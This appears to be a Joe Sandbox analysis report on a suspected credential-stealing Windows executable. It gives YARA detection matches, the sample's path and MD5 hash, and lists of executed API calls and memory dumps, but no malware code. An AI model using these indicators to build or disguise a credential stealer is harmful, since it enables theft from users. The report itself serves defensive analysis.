Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2243914715.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2244360588.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2241532296.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2241346372.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2224940192.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2243100835.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2242110728.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2241837316.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2243652288.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2244321003.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2242494146.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2242781558.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2243383940.0000000000C46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:59:25
Start date:	29/10/2024
Path:	C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe"
Imagebase:	0xe30000
File size:	2'792'448 bytes
MD5 hash:	D730CAAD65AD7FD200196A21832C5371
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	27.3%
Signature Coverage:	15.2%
Total number of Nodes:	33
Total number of Limit Nodes:	2

Executed Functions

Function 00FAF0F0 Relevance: 1.6, APIs: 1, Instructions: 137
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00FAF0F0

Memory Dump Source

Source File: 00000004.00000002.2499817397.0000000000FAC000.00000040.00000001.01000000.00000006.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000004.00000002.2499577326.0000000000E30000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499601402.0000000000E32000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499622986.0000000000E36000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499645120.0000000000E3A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499666484.0000000000E46000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499769729.0000000000F97000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499791416.0000000000F99000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499817397.0000000000FB9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499869034.0000000000FD3000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499888723.0000000000FD4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499909568.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499929421.0000000000FD7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499955459.0000000000FED000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499978714.0000000000FEE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500000700.0000000000FF5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500021434.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500045417.000000000100F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500070143.0000000001016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500092234.0000000001017000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500119525.0000000001018000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500143576.0000000001019000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500165950.000000000101A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500189364.0000000001025000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500214005.0000000001026000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500240117.0000000001027000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500263913.000000000102E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500286419.0000000001039000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500308170.0000000001041000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500327685.0000000001042000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500353961.0000000001044000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500376629.0000000001052000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500399793.0000000001053000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500419986.0000000001054000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500443491.000000000105B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500468625.0000000001062000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500489288.0000000001064000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500511782.0000000001065000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500536578.000000000106D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500563125.0000000001080000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500587247.0000000001081000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010C9000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010D0000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500677195.00000000010DE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500702115.00000000010E0000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e30000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 919422b0be9c14d15f23a784bbe311de030504d9e88aa83c30e1f3c20c2f9f59
Instruction ID: 6f70f5ec26ece7fb6bd619ea8e172b5b0fca05605c4b2c2a4695b31a7282cdfb
Opcode Fuzzy Hash: 919422b0be9c14d15f23a784bbe311de030504d9e88aa83c30e1f3c20c2f9f59
Instruction Fuzzy Hash: 6A3132F250C210AFF311AE48ED41BBABBE8EB85730F11483DF6C4D6600E675595497A7

Function 00E3B786 Relevance: 1.3, Strings: 1, Instructions: 18COMMON

Download Yara Rule

Strings

!!iH, xrefs: 00E3B8F6

Memory Dump Source

Source File: 00000004.00000002.2499645120.0000000000E3A000.00000040.00000001.01000000.00000006.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000004.00000002.2499577326.0000000000E30000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499601402.0000000000E32000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499622986.0000000000E36000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499666484.0000000000E46000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499769729.0000000000F97000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499791416.0000000000F99000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499817397.0000000000FAC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499817397.0000000000FB9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499869034.0000000000FD3000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499888723.0000000000FD4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499909568.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499929421.0000000000FD7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499955459.0000000000FED000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499978714.0000000000FEE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500000700.0000000000FF5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500021434.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500045417.000000000100F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500070143.0000000001016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500092234.0000000001017000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500119525.0000000001018000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500143576.0000000001019000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500165950.000000000101A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500189364.0000000001025000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500214005.0000000001026000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500240117.0000000001027000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500263913.000000000102E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500286419.0000000001039000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500308170.0000000001041000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500327685.0000000001042000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500353961.0000000001044000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500376629.0000000001052000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500399793.0000000001053000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500419986.0000000001054000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500443491.000000000105B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500468625.0000000001062000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500489288.0000000001064000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500511782.0000000001065000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500536578.000000000106D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500563125.0000000001080000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500587247.0000000001081000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010C9000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010D0000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500677195.00000000010DE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500702115.00000000010E0000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e30000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID:
String ID: !!iH
API String ID: 0-3430752988
Opcode ID: 57585e4c93903f885d8789d3579de30f7cd304328c65f6bf9c52bc6ea1d803a1
Instruction ID: 664dd2130cf025dab700a6c3bc629666b363156f4d6d83bed1d655d85b211dd7
Opcode Fuzzy Hash: 57585e4c93903f885d8789d3579de30f7cd304328c65f6bf9c52bc6ea1d803a1
Instruction Fuzzy Hash: BAE0C2316045C9CEDB1AAF6498057DA7E4EEB80700F602114FB03FAE46CB3D4C11D799

Function 00FBCB2E Relevance: 4.6, APIs: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00FBCB7B
RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00FBCBA2
GetNativeSystemInfo.KERNELBASE(?), ref: 00FBCBF9

Memory Dump Source

Source File: 00000004.00000002.2499817397.0000000000FB9000.00000040.00000001.01000000.00000006.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000004.00000002.2499577326.0000000000E30000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499601402.0000000000E32000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499622986.0000000000E36000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499645120.0000000000E3A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499666484.0000000000E46000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499769729.0000000000F97000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499791416.0000000000F99000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499817397.0000000000FAC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499869034.0000000000FD3000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499888723.0000000000FD4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499909568.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499929421.0000000000FD7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499955459.0000000000FED000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499978714.0000000000FEE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500000700.0000000000FF5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500021434.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500045417.000000000100F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500070143.0000000001016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500092234.0000000001017000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500119525.0000000001018000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500143576.0000000001019000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500165950.000000000101A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500189364.0000000001025000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500214005.0000000001026000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500240117.0000000001027000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500263913.000000000102E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500286419.0000000001039000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500308170.0000000001041000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500327685.0000000001042000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500353961.0000000001044000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500376629.0000000001052000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500399793.0000000001053000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500419986.0000000001054000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500443491.000000000105B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500468625.0000000001062000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500489288.0000000001064000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500511782.0000000001065000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500536578.000000000106D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500563125.0000000001080000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500587247.0000000001081000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010C9000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010D0000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500677195.00000000010DE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500702115.00000000010E0000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e30000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID: Open$InfoNativeSystem
String ID:
API String ID: 1247124224-0
Opcode ID: be136fa4af5084af52251fb0068e93db6b41e1478d980223116b5c36431d9cab
Instruction ID: 1b9a886ad79e541c0abbe32299f36f864b9f843ed6a5ea272e1a33838bb2fdc9
Opcode Fuzzy Hash: be136fa4af5084af52251fb0068e93db6b41e1478d980223116b5c36431d9cab
Instruction Fuzzy Hash: E9317AB250010E9FEF11DF50C889BEF3BA8EB15325F040126ED4682841E7B65DA8EF99

Function 00FAF246 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 146
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00FAF246

Strings

js, xrefs: 00FAF2C6

Memory Dump Source

Source File: 00000004.00000002.2499817397.0000000000FAC000.00000040.00000001.01000000.00000006.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000004.00000002.2499577326.0000000000E30000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499601402.0000000000E32000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499622986.0000000000E36000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499645120.0000000000E3A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499666484.0000000000E46000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499769729.0000000000F97000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499791416.0000000000F99000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499817397.0000000000FB9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499869034.0000000000FD3000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499888723.0000000000FD4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499909568.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499929421.0000000000FD7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499955459.0000000000FED000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499978714.0000000000FEE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500000700.0000000000FF5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500021434.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500045417.000000000100F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500070143.0000000001016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500092234.0000000001017000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500119525.0000000001018000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500143576.0000000001019000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500165950.000000000101A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500189364.0000000001025000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500214005.0000000001026000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500240117.0000000001027000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500263913.000000000102E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500286419.0000000001039000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500308170.0000000001041000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500327685.0000000001042000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500353961.0000000001044000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500376629.0000000001052000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500399793.0000000001053000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500419986.0000000001054000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500443491.000000000105B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500468625.0000000001062000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500489288.0000000001064000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500511782.0000000001065000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500536578.000000000106D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500563125.0000000001080000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500587247.0000000001081000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010C9000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010D0000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500677195.00000000010DE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500702115.00000000010E0000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e30000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID: LibraryLoad
String ID: js
API String ID: 1029625771-1145086106
Opcode ID: de10190c2245c19e33843b88d8a594f0d8bc8d3ed7b9b775807dea48be8dc5da
Instruction ID: 66034856c4a65457cfa1161ed66a42f1803ae307c7a28aa629b8d2921f7b157e
Opcode Fuzzy Hash: de10190c2245c19e33843b88d8a594f0d8bc8d3ed7b9b775807dea48be8dc5da
Instruction Fuzzy Hash: 3E417DB650D310AFE301AF69D8416BAFBF8FF95720F22882EE5C587215D73258449B63

Function 00FB37BA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 00FB37D8

Strings

C, xrefs: 00FB399C

Memory Dump Source

Source File: 00000004.00000002.2499817397.0000000000FAC000.00000040.00000001.01000000.00000006.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000004.00000002.2499577326.0000000000E30000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499601402.0000000000E32000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499622986.0000000000E36000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499645120.0000000000E3A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499666484.0000000000E46000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499769729.0000000000F97000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499791416.0000000000F99000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499817397.0000000000FB9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499869034.0000000000FD3000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499888723.0000000000FD4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499909568.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499929421.0000000000FD7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499955459.0000000000FED000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499978714.0000000000FEE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500000700.0000000000FF5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500021434.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500045417.000000000100F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500070143.0000000001016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500092234.0000000001017000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500119525.0000000001018000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500143576.0000000001019000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500165950.000000000101A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500189364.0000000001025000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500214005.0000000001026000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500240117.0000000001027000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500263913.000000000102E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500286419.0000000001039000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500308170.0000000001041000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500327685.0000000001042000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500353961.0000000001044000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500376629.0000000001052000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500399793.0000000001053000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500419986.0000000001054000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500443491.000000000105B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500468625.0000000001062000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500489288.0000000001064000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500511782.0000000001065000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500536578.000000000106D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500563125.0000000001080000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500587247.0000000001081000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010C9000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010D0000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500677195.00000000010DE000.00000040.00000001.01000000.00000006.sdmpDownload File
